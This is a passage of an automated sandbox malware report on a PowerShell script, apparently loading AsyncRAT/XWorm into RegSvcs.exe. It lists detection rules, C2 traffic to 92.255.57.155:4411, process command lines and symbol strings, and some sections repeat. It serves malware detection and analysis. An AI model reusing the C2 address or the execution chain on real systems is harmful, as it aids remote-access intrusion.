              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdbti4s|c;s source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdbj source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbH source: WERA716.tmp.dmp.12.dr
              Source: Binary string: ?koC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb% source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: %%.pdb)s( source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb8 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: HP_o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb: source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdbL0vw# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Configuration.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Windows.Forms.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2961772189.000000000611A000.00000004.00000020.00020000.00000000.sdmp, WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Drawing.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb4 source: WERA716.tmp.dmp.12.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: @ko.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr

              Networking

Source: Network traffic | Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49723 -> 92.255.57.155:4411
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.7:49723
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49723 -> 92.255.57.155:4411
Source: Network traffic | Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.7:49723
Source: Malware configuration extractor | URLs: 92.255.57.155
Source: global traffic | TCP traffic: 192.168.2.7:49723 -> 92.255.57.155:4411
Source: Joe Sandbox View | ASN Name: TELSPRU TELSPRU
Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.57.155 (49 occurrences)
Source: powershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB123D65 0_2_00007FFAAB123D65
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB1239AD 0_2_00007FFAAB1239AD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB1F0FA4 0_2_00007FFAAB1F0FA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D5C2D8 5_2_00D5C2D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D56340 5_2_00D56340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D584B8 5_2_00D584B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D5B598 5_2_00D5B598
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D55A70 5_2_00D55A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D55728 5_2_00D55728
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D50FA0 5_2_00D50FA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.21380403568.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.213812227a0.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engine | Classification label: mal100.troj.evad.winPS1@9/10@0/1
              Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oeawf5cb.5uc.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: WErY5oc4hl.ps1 | Virustotal: Detection: 31%
              Source: WErY5oc4hl.ps1 | ReversingLabs: Detection: 21%
              Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb[ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\RegSvcs.pdbF2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb" source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB89 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb^2 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdbti4s|c;s source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdbj source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbH source: WERA716.tmp.dmp.12.dr
              Source: Binary string: ?koC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb% source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: %%.pdb)s( source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb8 source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: HP_o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb: source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdbL0vw# source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Configuration.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Xml.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Windows.Forms.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2961772189.000000000611A000.00000004.00000020.00020000.00000000.sdmp, WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Drawing.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Management.pdb source: WERA716.tmp.dmp.12.dr
